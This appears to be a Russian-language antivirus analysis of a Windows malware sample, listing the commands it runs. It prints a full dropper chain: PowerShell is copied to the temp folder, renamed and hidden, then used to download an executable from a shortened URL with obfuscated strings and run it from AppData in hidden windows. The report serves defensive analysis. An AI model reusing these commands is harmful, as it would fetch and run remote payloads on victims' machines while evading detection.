Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c robocopy <SYSTEM32>\WindowsPowerShell\v1.0\ %temp% powershell.exe /mt /z & exit
- '<SYSTEM32>\cmd.exe' /c timeout /t 1 & cd %temp% & ren powershell.exe o.exe & exit
- '<SYSTEM32>\cmd.exe' /c %temp%\o.exe -w 1 cd $env:temp; Start-Sleep 3; (get-item o.exe).Attributes += 'Hidden'
- '<SYSTEM32>\cmd.exe' /c %temp%\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')
- '<SYSTEM32>\cmd.exe' /c %temp%\o.exe -w 1 Start-Sleep 7; Move-Item "vc.exe" -Destination "$env:appdata"
- '<SYSTEM32>\cmd.exe' /c %temp%\o.exe -w 1 Start-Sleep 12; cd $env:appdata; ./vc.exe;
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\powershell.exe
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c robocopy <SYSTEM32>\WindowsPowerShell\v1.0\ %temp% powershell.exe /mt /z & exit' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c timeout /t 1 & cd %temp% & ren powershell.exe o.exe & exit' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c %temp%\o.exe -w 1 cd $env:temp; Start-Sleep 3; (get-item o.exe).Attributes += 'Hidden'' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c %temp%\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c %temp%\o.exe -w 1 Start-Sleep 7; Move-Item "vc.exe" -Destination "$env:appdata"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c %temp%\o.exe -w 1 Start-Sleep 12; cd $env:appdata; ./vc.exe;' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\timeout.exe' /t 1
- '<SYSTEM32>\robocopy.exe' <SYSTEM32>\WindowsPowerShell\v1.0\ %LOCALAPPDATA%\Temp powershell.exe /mt /z
